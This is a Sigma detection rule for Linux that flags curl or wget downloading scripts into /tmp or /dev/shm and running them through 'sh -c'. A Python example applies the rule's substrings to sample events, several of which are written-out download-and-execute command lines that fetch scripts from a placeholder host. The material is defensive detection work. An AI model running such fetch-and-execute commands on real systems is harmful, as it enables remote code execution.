Suspicious Download and Execute Pattern via Curl/Wget

Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.

Sigma rule

title: Suspicious Download and Execute Pattern via Curl/Wget
id: a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa
status: experimental
description: |
    Detects suspicious use of command-line tools such as curl or wget to download remote
    content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by
    immediate execution, indicating potential malicious activity. This pattern is commonly used
    by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.
references:
    - https://gtfobins.github.io/gtfobins/wget/
    - https://gtfobins.github.io/gtfobins/curl/
author: Aayush Gupta
date: 2025-06-17
tags:
    - attack.execution
    - attack.t1059.004
    - attack.t1203
logsource:
    category: process_creation
    product: linux
detection:
    selection_downloader:
        CommandLine|contains:
            - '/curl'
            - '/wget'
    selection_tmp:
        CommandLine|contains:
            - '/tmp/'
            - '/dev/shm/'
    selection_executor:
        CommandLine|contains: 'sh -c'
    condition: all of selection_*
falsepositives:
    - System update scripts using temporary files
    - Installer scripts or automated provisioning tools
level: high
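To show how the three selections combine under `condition: all of selection_*`, here is an added Python example (not code from the rule's author or the Sigma project) that applies the rule's substrings to a few constructed process_creation events; it assumes Sigma's default case-insensitive string matching and a `CommandLine` field as the log source exposes it.

```python
"""Apply the rule's three selections to process_creation events.

Each selection is a list of substrings ORed together; the condition
'all of selection_*' ANDs the selections. Sigma string matching is
case-insensitive by default, so both sides are lower-cased here.
"""
# Substrings taken directly from the rule's detection block.
SELECTIONS = {
    "selection_downloader": ["/curl", "/wget"],
    "selection_tmp": ["/tmp/", "/dev/shm/"],
    "selection_executor": ["sh -c"],
}

def selection_matches(command_line: str, needles: list[str]) -> bool:
    """Sigma 'CommandLine|contains' with a list: any one needle may match."""
    haystack = command_line.lower()
    return any(n.lower() in haystack for n in needles)

def rule_matches(event: dict) -> bool:
    """condition: all of selection_* -> every selection must match."""
    cmd = event.get("CommandLine", "")
    return all(selection_matches(cmd, needles) for needles in SELECTIONS.values())

def matched_selections(event: dict) -> list[str]:
    """Names of the selections that hit; useful when triaging a partial match."""
    cmd = event.get("CommandLine", "")
    return [name for name, needles in SELECTIONS.items() if selection_matches(cmd, needles)]

# Constructed sample events (not real telemetry), shaped like a
# process_creation record. Event 1 mirrors the rule's listed false
# positive: a system update script staged under /tmp also fires.
SAMPLE_EVENTS = [
    {"Image": "/bin/sh", "CommandLine": "sh -c \"/usr/bin/curl -fsSL http://example.invalid/x.sh -o /dev/shm/.x && sh /dev/shm/.x\""},
    {"Image": "/bin/sh", "CommandLine": "sh -c '/usr/bin/wget -qO /tmp/update.sh https://example.invalid/u.sh; bash /tmp/update.sh'"},
    {"Image": "/usr/bin/curl", "CommandLine": "/usr/bin/curl -s https://example.invalid/api"},
    {"Image": "/bin/sh", "CommandLine": "sh -c 'ls /tmp/'"},
]

def triage(events: list[dict]) -> list[tuple[str, list[str]]]:
    """Return (CommandLine, matched selections) for every event that fires the rule."""
    return [(e["CommandLine"], matched_selections(e)) for e in events if rule_matches(e)]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_EVENTS):
        print("ALERT", hits, cmd)
```

Events 2 and 3 each hit only some selections and stay silent, which is the point of ANDing the three: a lone curl call or a lone `sh -c` touching /tmp is not enough on its own.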
